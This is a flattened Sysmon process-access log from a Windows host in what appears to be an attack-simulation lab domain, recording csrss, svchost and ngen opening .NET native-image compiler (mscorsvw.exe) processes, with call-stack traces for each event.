M32\ntdll.dll+51791 10341000x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.338{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9A03-00000000A301}4836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9903-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.213{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.213{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9803-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.135{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9703-00000000A301}4740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.041{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:07.025{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:07.025{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-920F-6005-9603-00000000A301}4780C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.619{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.619{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.619{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.510{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.494{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.494{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A703-00000000A301}220C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.447{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:08.431{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:08.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9210-6005-A603-00000000A301}3432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
